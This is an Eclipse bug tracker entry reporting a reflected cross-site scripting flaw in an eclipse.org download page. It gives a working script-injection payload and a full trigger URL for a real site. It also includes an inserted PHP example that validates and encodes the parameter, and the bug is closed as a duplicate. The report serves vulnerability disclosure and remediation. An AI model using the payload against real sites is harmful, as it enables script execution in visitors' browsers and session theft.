Bug 527762 - Cross site scripting
Summary: Cross site scripting
Status: CLOSED DUPLICATE of bug 518274
Alias: None
Product: Community
Classification: Eclipse Foundation
Component: Website
Version: unspecified
Hardware: All All
Importance: P3 major
Target Milestone: ---
Assignee: phoenix.ui CLA
QA Contact:
URL: http://www.eclipse.org/modeling/mdt/d...
Whiteboard:
Keywords: security
Depends on:
Blocks:
 
Reported: 2017-11-26 11:07 EST by Vikash Chaudhary CLA
Modified: 2017-11-27 04:46 EST

See Also:


Attachments
eclise screenshot (173.27 KB, image/png)
2017-11-26 11:07 EST, Vikash Chaudhary CLA

Description Vikash Chaudhary CLA 2017-11-26 11:07:09 EST
Created attachment 271643
eclise screenshot

Vulnerability Name : Cross site scripting 

Vulnerability Description : 

Vulnerable URL : 
http://www.eclipse.org/modeling/mdt/downloads/testResults.php?hl=1&ID=0.9.0/R200906190654&project=uml2tools&project=uml2tools

Vulnerable Item : ID

payload=0.9.0/R200906190654'"()%26%25<acx><ScRiPt >alert('hacked by vikash')</ScRiPt>


How to reproduce this issue 

1. Visit this URL; it will show an XSS alert popup.

http://www.eclipse.org/modeling/mdt/downloads/testResults.php?hl=1&ID=0.9.0/R200906190654'"()%26%25<acx><ScRiPt >alert('hacked by vikash')</ScRiPt>&project=uml2tools&project=uml2tools


POC : 

Screenshot enclosed in the attachment.
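
One way to handle the reflected `ID` parameter defensively, as an added example that is not part of the original report and not the eclipse.org code: allowlist the build ID, then HTML-encode it on output. The ID pattern (inferred from the single sample value in the report), the function names and the `<h1>` markup are assumptions.

```php
<?php
declare(strict_types=1);

// Assumed build-ID shape, inferred from the report's sample value
// "0.9.0/R200906190654": dotted version, slash, one letter, 12 digits.
const BUILD_ID_PATTERN = '~\A\d+(?:\.\d+){1,3}/[A-Z]\d{12}\z~';

/** Return the build ID if it matches the allowlist, otherwise null. */
function parse_build_id($raw): ?string
{
    // Array-style parameters (ID[]=...) arrive as arrays; reject them.
    if (!is_string($raw) || strlen($raw) > 64) {
        return null;
    }
    return preg_match(BUILD_ID_PATTERN, $raw) === 1 ? $raw : null;
}

/** Encode a value for an HTML text node or a quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render the fragment that reflects the ID (hypothetical markup). */
function render_heading($rawId): string
{
    $id = parse_build_id($rawId);
    if ($id === null) {
        // Do not echo the rejected value back, even encoded.
        return '<h1>Unknown build</h1>';
    }
    return '<h1>Test results for ' . h($id) . '</h1>';
}

// Constructed inputs: the well-formed ID from the report, the same ID with
// markup characters appended, and an array-style parameter.
$samples = [
    '0.9.0/R200906190654',
    '0.9.0/R200906190654\'"<b>x</b>',
    ['0.9.0/R200906190654'],
];
foreach ($samples as $sample) {
    echo render_heading($sample), PHP_EOL;
}

// Where a free-form value must be displayed, encoding alone keeps it inert.
echo h('\'"<b>x</b>'), PHP_EOL;
```

The allowlist rejects anything that is not a build ID before it reaches the page, and the encoding step stays in place so that a later loosening of the pattern does not reopen the reflection.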
Comment 1 Benjamin Cabé CLA 2017-11-27 04:46:12 EST

*** This bug has been marked as a duplicate of bug 518274 ***